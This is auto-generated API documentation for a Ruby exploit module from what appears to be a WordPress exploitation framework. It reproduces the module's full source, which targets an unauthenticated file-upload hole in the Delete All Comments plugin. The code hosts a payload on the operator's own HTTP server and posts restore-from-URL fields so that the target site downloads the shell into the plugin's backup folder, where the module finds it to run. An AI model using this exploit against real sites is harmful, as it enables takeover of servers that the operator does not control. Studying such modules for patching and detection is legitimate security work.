class Wpxf::Exploit::DeleteAllCommentsShellUpload
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::Net::HttpServer::new
# File lib/wpxf/modules/exploit/shell/delete_all_comments_shell_upload.rb, line 7 def initialize super update_info( name: 'Delete All Comments Unauthenticated Shell Upload', author: [ 'NinTechNet', # Discovery and disclosure 'rastating' # WPXF module ], references: [ ['WPVDB', '8694'], ['URL', 'http://blog.nintechnet.com/arbitrary-file-upload-vulnerability-in-wordpress-delete-all-comments-plugin/'] ], date: 'Dec 10 2016' ) register_options([ StringOption.new( name: 'http_server_host', desc: 'The external address of the host running this module', required: true ) ]) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/exploit/shell/delete_all_comments_shell_upload.rb, line 32 def check check_plugin_version_from_readme('delete-all-comments') end
download_url()
click to toggle source
# File lib/wpxf/modules/exploit/shell/delete_all_comments_shell_upload.rb, line 40 def download_url "http://#{datastore['http_server_host']}:#{http_server_bind_port}/#{Utility::Text.rand_alpha(8)}/#{payload_name}" end
on_http_request(_path, _params, _headers)
click to toggle source
# File lib/wpxf/modules/exploit/shell/delete_all_comments_shell_upload.rb, line 55 def on_http_request(_path, _params, _headers) payload.encoded end
payload_body_builder()
click to toggle source
# File lib/wpxf/modules/exploit/shell/delete_all_comments_shell_upload.rb, line 44 def payload_body_builder builder = Utility::BodyBuilder.new builder.add_field('restorefromfileURL', download_url) builder.add_field('restorefromfileNAME', payload_name) builder end
run()
click to toggle source
Calls superclass method
Wpxf::WordPress::ShellUpload#run
# File lib/wpxf/modules/exploit/shell/delete_all_comments_shell_upload.rb, line 59 def run start_http_server(true) success = super stop_http_server success end
uploaded_payload_location()
click to toggle source
# File lib/wpxf/modules/exploit/shell/delete_all_comments_shell_upload.rb, line 51 def uploaded_payload_location normalize_uri(wordpress_url_plugins, 'delete-all-comments', 'backup', payload_name) end
uploader_url()
click to toggle source
# File lib/wpxf/modules/exploit/shell/delete_all_comments_shell_upload.rb, line 36 def uploader_url normalize_uri(wordpress_url_plugins, 'delete-all-comments', 'delete-all-comments.php') end